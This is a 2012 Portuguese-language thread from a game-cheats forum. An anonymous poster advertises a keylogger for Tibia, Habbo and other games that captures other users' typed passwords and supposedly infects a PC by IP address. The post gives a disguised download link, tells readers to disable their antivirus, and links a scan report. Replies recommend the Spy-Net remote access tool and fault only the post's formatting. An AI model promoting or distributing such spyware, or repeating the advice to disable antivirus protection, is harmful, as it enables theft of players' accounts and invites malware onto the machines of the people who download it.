WorldCheats
Seja bem vindo!!
WorldCheats
Seja bem vindo!!
WorldCheats
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

WorldCheats

Hackers e cheats para jogos. WDcheats
 
InícioPortalProcurarÚltimas imagensRegistarEntrarLoja
Olá, Convidado!! Não é registrado? Registre-se e se já estiver registrado faça o login aproveite o conteúdo, hackers, cheats, moddings, e claro, sempre com toda a segurança, nós fornecemos o site de scan, caso alguém faça um falso nós mandaremos um aviso, e EXCLUIREMOS o tópico.
Olá, µënrïqüë. Não sabe onde encontrar o site de Scan, nem o de criar downloads? Clique aqui para fazer scan, e clique aqui para criar download.

 

 [NEW]KeyLogger Tibia e Varios Outros Jogos

Ir para baixo 
3 participantes
AutorMensagem
Convidad
Convidado
Anonymous



[NEW]KeyLogger Tibia e Varios Outros Jogos Empty
MensagemAssunto: [NEW]KeyLogger Tibia e Varios Outros Jogos   [NEW]KeyLogger Tibia e Varios Outros Jogos Icon_minitimeDom Fev 19, 2012 10:44 am

Aew rapaziada estou aqui para divulgar um keylogger especial para jogos ele serve para Tibia,Habbo e muitos outros jogos,(Eu Nao Sei Como Funciona Mais Tenho Certesa Que Alguem Vai Saber) mas ele não serve só para você ficar espiando o que os outros estão conversando ele também possui uma ferramenta que grava toda palavra decodificada escrita(senhas).
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
O programa infecta outro pc por ip então é necessário que você tenha um programa de pegar ip eu recomendo o ipget so procurar no google.

Obs: Como este keylogger é um malware ele possui para sua funcionalidade vírus não prejudiciais para seu pc mas é necessário que desative seu antivirus.
Link do Keylogger:
http://cad.canalmailbrasil.com.br/cm/descargar.php?label=webcheats.com.br&cod=br4343&url=aHR0cDovL3d3dy40c2hhcmVkLmNvbS9maWxlL2ktTTlYekdsL1RpYmlhX0tleWxvZ2dlci5odG1s
Link do Scan:
http://www.virustotal.com/file/36fd0a2d0a2914f699e654d208c3640fa13377e38c737b5029993fef07f0e8a4/analysis/1329412781/
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Ir para o topo Ir para baixo
ZeLuiz
Membro
Membro
ZeLuiz


Mensagens : 127
Agradecimento : 16
Data de inscrição : 18/02/2012
Localização : I Don't Know

[NEW]KeyLogger Tibia e Varios Outros Jogos Empty
MensagemAssunto: Re: [NEW]KeyLogger Tibia e Varios Outros Jogos   [NEW]KeyLogger Tibia e Varios Outros Jogos Icon_minitimeDom Fev 19, 2012 4:01 pm

eu uso o spy-net só precisa que alguém baixe o serve
Ir para o topo Ir para baixo
GeanDavid
Membro
Membro
GeanDavid


Mensagens : 87
Agradecimento : 10
Data de inscrição : 20/02/2012
Idade : 29
Localização : Point Blank

[NEW]KeyLogger Tibia e Varios Outros Jogos Empty
MensagemAssunto: Re: [NEW]KeyLogger Tibia e Varios Outros Jogos   [NEW]KeyLogger Tibia e Varios Outros Jogos Icon_minitimeSeg Fev 20, 2012 2:48 am

Spy net é melhor que eu ja usei por enquanto né vamos ver o a técnologia nos trás Smile
Ir para o topo Ir para baixo
http://www.pointblank.com.br
Convidad
Convidado
Anonymous



[NEW]KeyLogger Tibia e Varios Outros Jogos Empty
MensagemAssunto: Re: [NEW]KeyLogger Tibia e Varios Outros Jogos   [NEW]KeyLogger Tibia e Varios Outros Jogos Icon_minitimeSeg Fev 20, 2012 8:43 am

organize seu topico
da um Enter na hora que for posta os links de download e scan!!!!
Ir para o topo Ir para baixo
Movie
Moderador
Moderador
Movie


Mensagens : 52
Agradecimento : 2
Data de inscrição : 22/02/2012
Idade : 27

[NEW]KeyLogger Tibia e Varios Outros Jogos Empty
MensagemAssunto: Re: [NEW]KeyLogger Tibia e Varios Outros Jogos   [NEW]KeyLogger Tibia e Varios Outros Jogos Icon_minitimeSáb Fev 25, 2012 7:30 pm

Tópico não esta muito Bem Organizado . Tente melhorar .


Com os erros , temos o aprendizado .
Ir para o topo Ir para baixo
Conteúdo patrocinado





[NEW]KeyLogger Tibia e Varios Outros Jogos Empty
MensagemAssunto: Re: [NEW]KeyLogger Tibia e Varios Outros Jogos   [NEW]KeyLogger Tibia e Varios Outros Jogos Icon_minitime

Ir para o topo Ir para baixo
 
[NEW]KeyLogger Tibia e Varios Outros Jogos
Ir para o topo 
Página 1 de 1
 Tópicos semelhantes
-
» Novo Evento Jogos WDC !
» Perx Injetor para Jogos !
» Tibia MC 9.53 Tibia Bot Ng crack 9.53 Tibia bot ng 9.53 FULL CRACKED neobot 9.53 + tibia auto 9.53 + PYTHON 24 bbot 9.53 tibia cam 9.53
» Tibia Bot NG 9.51 / Tibia MC 9.51 / Tibia Auto 9.51 / Tibia IP Changer 9.51 / Tibia RED Bot 9.51 / BUGWT SCRIPTS !!! (100% safe)
» Tibia MC 9.85 Download crack 9.85 Tibia bot ng 9.85 FULL CRACKED neobot 9.85 + tibia auto 9.85 + PYTHON 24 bbot 9.85 tibia cam 9.85

Permissões neste sub-fórumNão podes responder a tópicos
WorldCheats :: Tibia :: Tibia Downloads/Cheats-
Ir para: